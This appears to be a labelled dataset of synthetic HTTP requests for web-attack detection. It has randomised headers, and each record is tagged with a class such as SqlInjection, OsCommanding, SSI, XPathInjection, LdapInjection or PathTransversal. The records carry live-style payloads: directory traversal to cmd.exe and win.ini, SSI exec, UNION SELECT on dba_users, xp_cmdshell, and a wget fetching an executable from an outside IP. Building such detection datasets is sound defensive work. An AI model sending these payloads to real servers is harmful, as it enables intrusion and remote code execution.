Date: Wed, 20 Dec 06 14:33:59 CET
ETag: "z@VDwv-LBAonIc6"
Expect: rttt=uyHbwh7I
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 16 Jul 05 13:47:46 UTC
If-Unmodified-Since: Tue, 19 Feb 08 15:32:06 CET
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 5
MIME-Version: 2.6
Pragma: i30cor=aaP5NEe
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest username="6yeim"
Range: 08647-744
Referer: /etDnrSft/fm7soNe/9pwd.txt
TE: gzip;q=0.3,chunked,gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: voikz4h2l9 http://www.Inred.fr
UA-CPU: PowerPC
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 881x134
Via: FTP/6.6 www.tsnjM4ci.css:855, 0.4 243.144.177.121:23466, 6.0 203.235.97.34:6143
Transfer-Encoding: compress
X-Forwarded-For: 249.181.31.217
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43585
Start - Id: 40310
class: SSI
GET /seutdsui/zEGgfromFCv0qSLP/fcsRkn8/YinputCI/hlnwhahtpexk/sr8vt/aA0rx3JWJhSoOvWV6j8/wULqlikeVM8hvetcbs/nyft/xmlBetcM.gif?eheeosnexl=%2Fsii&VT=326&encfnt2=hahcN&nrepaq=%3C%21--++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CFyThtaean%5Cnirefsp%5CQi.exe+++++d%3A%5CeCejau%5Cwww.stellali.org%5CAjfrbsa%5Cdatabase.mdb+++%2Fx+++exporttofoxpro%22--%3E&eoihIoru=goodelete++dnhoe&8ys=matisrehonmhrheoe HTTP/1.1
Host: 5.193.40.249
Connection: ssnoyns
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: isSrOds='lscte4p'
Client-ip: 189.175.1.221
Cookie: nvotsqntsconseR=n&win;cdin
Cookie2: $Version="373"
Date: Wed, 27 Jul 05 06:29:08 UTC
ETag: "r3kUxZs8g68yc5f8L"
Expect: 100-continue
From: eeom@9Ehl.gov
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Wed, 03 Sep 08 20:37:04 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Nov 06 18:07:20 CET
Max-Forwards: 44
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: Digest nc=c473921A
Range: -2115,0045-233,-51
Referer: http://forn6S.gov/phmnH/aiomt12u.swf
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: fksErz5E http://www.hlociCI.com
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 457x7913
Via: 0.3 78.171.60.206
Transfer-Encoding: deflate
Upgrade: llx/6.8, susFt/0.9, sep2er/8.1, fxahr/9.5, oEs/3.3
Warning: 569 252.52.85.196 "izcvnbou" "Wed, 03 May 06 17:08:51 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40310
Start - Id: 45095
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.EgrWtOs.st
Connection: rnHrsh3
Accept: audio/*;q=0.4, image/*;q=0.3
Accept-Charset: x-mac-cyrillic, us-ascii;q=0.3, x-mac-chinesesimp, x-mac-hebrew, x-mac-chinesetrad
Accept-Encoding: compress
Accept-Language: hgEhrmn-ib0bl;q=0.1, gondo-4ieoep, ima-a, pogn4-item;q=0.3, traEtoi-eoif3oou
Cache-Control: nir=e
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="97"
Date: Fri, 24 Apr 09 06:36:25 UTC
ETag: "NeIswK_7a5EBHO2LNI"
Expect: Snishje=s5Er;leRCEdsR
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Sun, 28 Nov 04 01:30:10 UTC
If-Match: "xsrL4ZLDU3J93eC0Z"
If-None-Match: "gAja489I21QsH_zgF6bm"
If-Range: Tue, 14 Oct 08 04:05:51 CET
Max-Forwards: 950
MIME-Version: 6.7
Pragma: ahla='llt'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: 61-,599945-,96-
Referer: http://Lhot.fr/he8Gv/tucroMd.pl
TE: gzip;q=0.6,trailers
Trailer: Connection
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 3.7; Eo-hi; rv:2.5.6) Gecko/35093192
UA-CPU: StrongARM
UA-Disp: 307,059,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 1.0 142.220.151.197
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 888948293
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45095
Start - Id: 43991
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 62.224.79.66
Connection: oo5d
Accept: */*;q=0.6
Accept-Charset: x-mac-cyrillic, utf-8;q=0.7
Accept-Encoding: *
Accept-Language: v-Eb, prtO-wuadtj;q=0.0, ri23jlm-h;q=0.8
Cache-Control: max-age=80563
Client-ip: 132.146.99.62
Cookie: lictMeO=ns 
Cookie2: $Version="49"
Date: Fri, 30 Jan 04 23:20:59 UTC
ETag: W/"KWt6cmpUGlB3N9ot-m-c"
Expect: 5titid9=sseu
From: 44fa@mshrPyo.gov
If-Modified-Since: Fri, 21 Dec 07 21:37:06 GMT
If-Unmodified-Since: Sun, 06 Jan 08 14:36:50 GMT
If-Match: "c-fLi71JGG3ITG0UI"
If-None-Match: "S7aGc5OXUPvl1LMd"
If-Range: Wed, 05 Nov 08 24:06:37 CET
Max-Forwards: 14
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aGR5YmlBdzphZG5zb3U=
Range: -2,795-,-91
Referer: /IToaes.html
TE: trailers
Trailer: Referer
User-Agent: rloo (sGDr@AZ; d.cB1J_b; yLptwIi; dnHa65RT)
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.1 www.trohA2sS.gif, ehd/3.6 250.138.35.59:99, ono4wp/7.1 www.edd8oooe.shtml
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: uOlpzt/0.0, odsnal/9.4
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 1714241
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43991
Start - Id: 35490
class: XPathInjection
GET /5KeVg@njN90dUgyPYHHe/oU97m.bin? HTTP/1.1
Host: www.0rhG.net:80
Connection: close
Accept: text/*, application/zip
Accept-Charset: *;q=0.0
Accept-Encoding: 
Cache-Control: min-fresh=0380
Cookie: fn37s9esn2t4=nfaosu'    or  path/child::node()[position()=N]    or 'fR2ov'  = ';5seyoeio=fmzteTSje
Date: Wed, 21 Mar 07 18:58:53 GMT
If-None-Match: "o2ZL.vL5ijcSPO@U"
Max-Forwards: 61
Pragma: no-cache
Authorization: Digest response="0dAe638DEA9886FE7de5cccbA54DAfb1"
Referer: http://www.7sosgs.org/etTigni/mdneoire/tnep/7add.msf
User-Agent: Mozilla/8.6 (X11; U; Linux i586 5.6; 1e-ms; rv:5.9.7) Gecko/73029494
Via: HTTP/3.5 162.52.160.253:05, 2.4 231.18.214.21, 9.8 www.4rdoy4.html
Transfer-Encoding: compress
X-Forwarded-For: 184.57.165.17

null

End - Id: 35490
Start - Id: 37578
class: LdapInjection
POST /irrbeUgSe4Spinhrawv8/oream49gioRsosb/stdiniformObfservicesz/9xFinputvHTGX.pl? HTTP/1.0
Content-Length: 71
Content-Language: et,qe
Content-Encoding: identity
Content-Location: /ceEs/lieea/onritgtP/rntq7.png
Content-MD5: ZW9yc29IZ2hhZ2FCbGNvYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Aug 04 15:53:27 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: 207.72.220.152
Connection: keep-alive
Accept: text/xml, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 0ns-oii
Cache-Control: max-age=21357
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="2"
Date: Wed, 11 Feb 04 06:21:17 UTC
ETag: W/"A92uOn1wRLAjIgH"
Expect: sisuril=Atipjoc;vtlmheD8
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 20 Nov 05 11:48:15 GMT
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: "IFFhuDtpmcs89Rgl"
Max-Forwards: 77
MIME-Version: 0.1
Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM UnJueW5CZWhpemhwYWJzTmZjaDNvZWx5eXNyaGlocmVhdHRsZXRvY2NhZHRrcm8=
Range: 36-,-7
Referer: /8eti.png
TE: trailers,deflate,chunked;q=0.7
Trailer: If-None-Match
User-Agent: cafba/6.4.0
UA-CPU: Sparc
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: deflate
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 891 www.Senj6a.tiff "aiMu" "Wed, 07 Jun 06 17:57:47 CET"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aav=hor)(&(objectClass  = lT*)&eiloeaapst64llg=rY@6LOgtyZ

End - Id: 37578
Start - Id: 50091
class: XPathInjection
PUT /rDisolgfehNanTpus.exe? HTTP/1.0
Content-Length: 249
Content-Language: hEah0c,oeSi,ctsndn
Content-Encoding: compress
Content-Location: /onde.asmx
Content-MD5: bGF0Y25pZXNlZG56aWFvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Oct 04 17:40:24 CET
Last-Modified: Tue, 22 Nov 05 19:00:13 GMT
Host: www.Toaohumic.biz
Connection: close
Accept: */*;q=0.1
Accept-Charset: macintosh;q=0.4, x-mac-roman;q=0.9
Accept-Encoding: gzip;q=0.0, compress, identity;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 187.202.192.82
Cookie: ayjx6eAOqTlneR7=182383;edd5=870605;ope8mawg2fp0=i~5input];mertyorh=ar'   or   raobwn/zn/child::node()[processing-instruction()=5]   or 'Taetaorp' = ';JWqtc=gaect;nrhcesEstnn=deeodee
Cookie2: $Version="182"
Date: Thu, 30 Oct 08 02:06:45 UTC
ETag: "h2ntYS_PIagTaRIj"
Expect: uSist
If-Modified-Since: Sat, 30 Aug 08 07:10:15 GMT
If-Unmodified-Since: Thu, 15 Dec 05 01:29:51 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 466
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: iina0E u2nmigt=TcO1ctyp
Authorization: htrn oanaott=odat4
Range: 691-,389-4,344185-683
Referer: http://D7nmGm.st/ksj1est/iuqs2/ludl1/ndoyrta.wav
TE: trailers,chunked,trailers
Trailer: Warning
User-Agent: nad4lwnR/2.6.4
UA-CPU: 68000
UA-Disp: 534,2890,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4253x311
Via: FTP/9.0 www.eateI.png, 3.8 68.155.85.192
Transfer-Encoding: compress
Upgrade: abzn/6.6, djoIix/7.9, 1moNsy/4.9, Avqok5/6.5, pan/8.3
Warning: 653 103.93.101.105:17 "aetlgatnhrco" 
X-Serial-Number: 42303
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

edinro7tiin=eY.4Ivy&oeguvh1=eIite0Ttd&Dr5Nalbsopsra7=etntel3ptltamtoasi&nuTAKIe=2e&echo3N@89=<t542n-%u<i(  &nqpeo=4621&ou=ieauzardeneumochaem5d&Oh=1978&tycobh=257604&r8pullvE7=w&crma1l9msmfdSh=5cndb&pzfG1RUr=5&ntuw=Oepassthru=&lest=rNioqof

End - Id: 50091
Start - Id: 44407
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 148.113.253.252
Connection: keep-alive
Accept: image/png, application/x-tar, audio/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: ic2Wge-tanir;q=0.9, lhmr-mes77r, fna-aposn;q=0.2
Cache-Control: only-if-cached
Client-ip: 136.18.89.145
Cookie: ssbmna=5
Cookie2: $Version="3"
Date: Fri, 04 Aug 06 19:22:51 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: on76@weg6se.uk
If-Modified-Since: Tue, 20 Jan 04 21:03:03 CET
If-Unmodified-Since: Wed, 25 Jul 07 17:32:40 CET
If-Match: *
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: "tSAH3lz8Majy6XN"
Max-Forwards: 1766
MIME-Version: 6.5
Pragma: iee99='h'
Proxy-Authorization: ewtxee iOsamfm=Clcele
Authorization: oigi5 uil1eat=nanstcl
Range: 07334-,0929-,-17620
Referer: http://www.ayta0dl.de/rs4co.gif
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: uohEI/5.7.5
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 6.1 125.113.168.19, FTP/3.8 www.HnTdo.jpeg, 8.5 171.237.138.74
Transfer-Encoding: deflate
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 207.201.80.136
X-Serial-Number: 16197588346334119700
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44407
Start - Id: 39483
class: SSI
POST /ocnuagl/eritincoSIi/oasMrpiibeOjcn/K-fiQpOzdropj/SEpdwr7uYualhRateM/hrlledtoDi.php? HTTP/1.0
Content-Length: 114
Content-Language: ri8,eweonoo,eslato6
Content-Encoding: identity
Content-Location: /6hcoeesc/hEmepwr6/SjoEpc.msf
Content-MD5: bnRwZGVaaHRudXJzY2wxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jan 04 04:01:51 CET
Last-Modified: Tue, 23 Nov 04 24:13:19 GMT
Host: 236.60.141.145
Connection: close
Accept: application/*;q=0.8, application/zip, image/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: R0sts-a
Cache-Control: min-fresh=7
Client-ip: 128.206.102.122
Cookie: ng=<!--#echo var="date_gmt"-->
Cookie2: $Version="855"
Date: Thu, 08 Dec 05 18:42:19 GMT
ETag: W/"8wf2.lQjUcaE8GJesoy"
Expect: 100-continue
From: etna6ghR@shets.ch
If-Modified-Since: Fri, 02 Dec 05 18:22:01 CET
If-Unmodified-Since: Mon, 06 Sep 04 13:33:12 UTC
If-Match: "vbNlkFSzUc8hF8@"
If-None-Match: "8ehW8ZK5Z_SyyEjc89"
If-Range: Thu, 01 Apr 10 10:47:54 CET
Max-Forwards: 211
MIME-Version: 6.7
Pragma: no-cache
Authorization: NTLM dHRpMHVwdGpzeWVzM1oydWU0dTVlb3lhaTBmdzI3YUli
Range: 27876-645677,2-,93777-
Referer: /akalQe.jpeg
TE: chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: 2jSslBnlinuE
UA-CPU: MIPS
UA-Disp: 0825,547,16
UA-Color: color8
UA-Pixels: 890x8709
Via: HTTP/0.6 www.dne9as.gif:72222, HTTP/4.8 www.SrRwpb3e.htm:3
Transfer-Encoding: gzip
Upgrade: orrhwl/0.7, tca0e/0.7
Warning: 917 16.207.105.181 "mish" "Fri, 20 Mar 09 11:49:12 GMT"
X-Serial-Number: 6016144
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

swemdzuBpsr=gm nnsef&YXFT7yaDYu=eis tr e&enucteeu=mo4R0hshxcutr&tlezra=T&qneduieaSpe=lJ285TvgwmLx&ae3snsa=iqUXB3WA

End - Id: 39483
Start - Id: 42203
class: SqlInjection
GET /o1AvW@ORMOzj/eno9e0ooh/a_9OdqwEh_W/ra/L96fTsredttNods.bin?8qz6swr=chairs%27+++++UNION+++++SELECT+dvuItf++FROM++++dba_users++WHERE++name++++like+++++%27%2525 HTTP/1.1
Host: www.je5dtewase.ch
Connection: close
Accept: application/*, image/*, image/jpeg;q=0.4
Accept-Charset: iso-8859-1, iso-8859-6;q=0.0, ks_c_5601-1987, x-mac-japanese;q=0.9, x-mac-turkish
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 39.241.110.69
Cookie: 1iaiof5s9=bylejgqoca4qdue;d9mto8elEkw=is<ttrscRoocIW;h__flike1dJ=282105
Cookie2: $Version="83"
Date: Sun, 27 Jun 04 10:04:44 CET
ETag: W/"fn7bj1SqWuSxNn3lC"
Expect: 100-continue
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 25 Mar 10 05:07:50 CET
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: *
If-None-Match: "qB_XvF9v028UTkyxT"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: eewl hlzcoi=4weu
Range: 8473-303,-227666,770360-
Referer: /ohwhboo/MeeshiEa/7hmtid/hdigbEe.jsp
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 3.7; an-o5; rv:7.0.1) Gecko/36016979
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x5537
Via: 4.6 126.11.149.103, qonc/4.8 www.lLv4sa.tiff
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 174.56.222.47
X-Serial-Number: 646981931152
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42203
Start - Id: 42262
class: SqlInjection
GET /e0euheoe4I6ny/uPr0Y-jES_Dl7rVrX6S/ehuwip7Ws0ea0edkis/stiekswrC/s.Kor/iSyAq_wd4fZ-ld9FyLZ/q3niLr/3ANcC8p5hY/eHeCe50de.js?WUcmdSJetc3DP=OR+%27sa5e%27++++BETWEEN+%27R%27++++AND+%27T%27&p.@jHXW4zbetween=iW.7ek6X&tLegEd2tva3aia=ooalli HTTP/1.0
Host: www.mb1nfnhnt.de
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: utf-7;q=0.4
Accept-Encoding: 
Accept-Language: rElep0e-3s, ssi-ip6ng;q=0.5, faiQl-inEihwOe, 2afTrey-ohiwepdo;q=0.7, 6olna4l6-jtiedt;q=0.6
Cache-Control: max-age=93
Client-ip: 164.216.181.230
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Wed, 26 Oct 05 22:22:40 CET
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: eethwr@T5iivnsieh.be
If-Modified-Since: Tue, 10 Apr 07 07:54:03 CET
If-Unmodified-Since: Mon, 11 Jan 10 10:50:34 CET
If-Match: "lxlWcYMj7Y3KNOJ7c"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: "8mntve7@6eNZF0Jt1v"
Max-Forwards: 5
MIME-Version: 6.9
Pragma: ds=si4
Proxy-Authorization: Digest opaque="7ytlNcaS"
Authorization: Digest qop=auth
Range: 041331-40746,8485-207,-9
Referer: /xniiS/pRu4/o8dc.php4
TE: chunked,gzip;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 9.9; 5p-ii; rv:0.5.8) Gecko/80114222
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4325x083
Via: 6.4 236.124.156.47, arctn/0.7 22.216.234.187
Transfer-Encoding: hlwlr
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 050 47.45.71.159 "xvo7fEn2eRnq" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42262
Start - Id: 36646
class: OsCommanding
POST /dmQ_/pewnnpazl1cicuousieE/zVXIyD/MCLydH.mdb? HTTP/1.0
Content-Length: 215
Content-Language: Eletn,nadaf
Content-Encoding: gzip
Content-Location: /yxvd/7reger/smSdr/rohtm.bin
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Apr 05 08:18:07 CET
Last-Modified: Tue, 07 Feb 06 01:27:33 CET
Host: 72.48.45.113
Connection: c0oa
Accept: application/zip;q=0.3
Accept-Charset: iso-8859-8;q=0.1
Accept-Encoding: identity;q=0.0
Accept-Language: ai7eH7e-8;q=0.1, soatp9em-g;q=0.0, vse-i4, e5-ft;q=0.1, s-8jneE0eo
Date: Tue, 28 Sep 04 07:54:34 GMT
ETag: W/"VKA0axwgrisEqosAaYBp"
If-Modified-Since: Sun, 25 Mar 07 15:09:51 CET
If-Match: *
If-None-Match: "tvJu4o@X7_TKt6U"
Authorization: Digest nc=BcCC4BAB
Referer: /eesmcuss/egslp/9itoo7/ntOa/arDfs.tar.gz
User-Agent: tiiaoke
UA-CPU: StrongARM
UA-Pixels: 782x498
Transfer-Encoding: identity
X-Forwarded-For: 24.190.144.96

hrfho=tlSxE&41=gUlehanderai&XFnimgsystemmZUbcnetcat=937&4anb0cca54iephd=9434808&rcshwbso2w=eZeqMNXpVJ&1nm1oaAer= tbrtobfa&formUD5LmetaX_sUG=142.121.67.153 |  dir+c:\&gTh2nb=aD-&ern9uyicnse=92905346&wyec=4438

End - Id: 36646
Start - Id: 43584
class: OsCommanding
GET /dZjJ7HlXBn@VJ./id5bu0neshegb/h-cPA-T0.Y7L3qUJwzg/7lFrsyaEcoz/s9en2C6QgTKkocFrsw@q/a@LPJ5MZwbO/2opencL/sya/eEcWcj0DHOxKPkKEc/Ot0eLrhThiaa3heR/fXFaF1VRBqCAPJrqxy5/iUn.sh?n2teo6itaht7oe=2fytp&7siitveewdehco=%5Cn+wget+++++http%3A%2F%2F143.244.13.123%3A9967%2Fnftp.exe&nssaWEnoe=edooitioom&olltyestc=7&tSi3Eedrns=fxecc%3DApasswdpositionlscfge&aeNetwkre=yd1&w5z=trtaii&ojxk=cim&ofRtaa=%7C HTTP/1.1
Host: www.6r5ddio.net
Connection: close
Accept: audio/x-wav, application/*;q=0.7
Accept-Charset: iso-8859-6, x-mac-hebrew
Accept-Encoding: gzip, deflate;q=0.4
Accept-Language: *
Cache-Control: min-fresh=34
Client-ip: 43.226.69.253
Cookie: delete8q2FLsaA=sWemefdae;n8agq4drndd=son;vCwer1at=~zando;nOeagde8Zncvr=i;Istoyttehoe=gesDs;Uaecbeoeob=R nt
Cookie2: $Version="9"
Date: Wed, 06 Jan 10 23:38:27 CET
ETag: "z@VDwv-LBAonIc6"
Expect: rttt=uyHbwh7I
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 01 Oct 05 23:54:45 UTC
If-Unmodified-Since: Tue, 19 Feb 08 15:32:06 CET
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 2576
MIME-Version: 2.6
Pragma: i30cor=aaP5NEe
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest username="6yeim"
Range: 08647-744
Referer: http://www.niGet.gov/obQte/odae1/tswr/ieith/osysam.php3
TE: chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (Windows; U; Windows NT 2.7; yv-4o; rv:5.2.6) Gecko/13509497
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 881x134
Via: FTP/6.6 www.tsnjM4ci.css:855, 0.4 243.144.177.121:23466, 6.0 203.235.97.34:6143
Transfer-Encoding: compress
X-Forwarded-For: 171.91.103.182
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43584
Start - Id: 41007
class: SqlInjection
POST /frj9mH/hpGIg.tiff? HTTP/1.1
Content-Length: 200
Content-Language: l,eha
Content-Encoding: identity
Content-Location: http://ciehAte.st/wsowa/cilm/nhgruun/qt0EE/rehI.cgi
Content-MD5: MmVpbGFldTlvb3JsZW50RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Jan 06 01:27:10 GMT
Last-Modified: Thu, 07 May 09 11:08:51 CET
Host: www.mt5pqc.com:52147
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=40
Client-ip: 40.88.12.243
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="889"
Date: Tue, 06 Nov 07 20:59:05 GMT
ETag: W/"yB2VYqpUnbgTE.vlG9"
Expect: v0sro3=eghTm;eprtAa2
From: 7nl6mn3@atvy.de
If-Modified-Since: Mon, 31 May 04 23:01:38 CET
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: "wcDouEweHi0eKf@0IHba"
If-None-Match: *
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 795
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest response="Da7EBFf2e6D8F588b475adAdda612ba3"
Authorization: 9etso itrab=ohxvo2N
Referer: http://t4htMs.gov/w5Ls5/chyw/h4rria4.jsp
TE: trailers,gzip
Trailer: Expect
User-Agent: aa5aac/9.4
UA-Pixels: 892x2342
Via: 9.1 204.101.191.39:95704, FTP/4.1 170.126.25.12
Transfer-Encoding: identity
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 134.103.78.204
X-Serial-Number: 0694203566390094
----: ------------

hRthnrgXoagi=WyatU&aie0ytTr=1346&adn5hrgb=pQp3Z&jhrywPuwo=iy>cNxeks&psrSasad=';EXECmaster.dbo.xp_cmdshell'cmd.exe&-6s_iAid4scriptQ_=atuutnimeenesvrst&pExtermMAL7=51&0H4and1uGMJZuwp-=iMH3heSeic

End - Id: 41007
Start - Id: 39355
class: SSI
GET /lacar/eG.JrDco/alqaf290Ex@9@owl/nJHbPs0PQHXu.aspx?zttbtnll8Vt1=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&hiLvlh7soe=pNyF&sedoleni0on=fi%29ilybusriai&nipr=onpobject&repnerEehtmdea=uteR4&egssrlahsoa=8627246&teN60doqSmttine=008 HTTP/1.1
Host: www.arDt2.be
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: soyz-t;q=0.9, sa2y-iirr, egaS8ole-h, j8nillej-azlis, toft-iPnih;q=0.0
Cache-Control: min-fresh=84
Client-ip: 183.110.148.152
Cookie: AneceNt3=boot.ini-y2tE o'O0etelswhere/n;ulaen3cey=8c'sscwgety:liframeAMrdo]T;ThzBtaie=055;p98=dNQB;heowsndjet=g
Cookie2: $Version="50"
Date: Thu, 22 Apr 10 10:26:53 GMT
ETag: W/"@4NOJSZ4ADlYgjcuK"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Wed, 25 Jul 07 24:32:20 UTC
If-Unmodified-Since: Mon, 27 Sep 04 10:00:34 CET
If-Match: "0Ms39NikF286_k.GHIWg"
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: *
Max-Forwards: 919
MIME-Version: 9.5
Pragma: no-cache
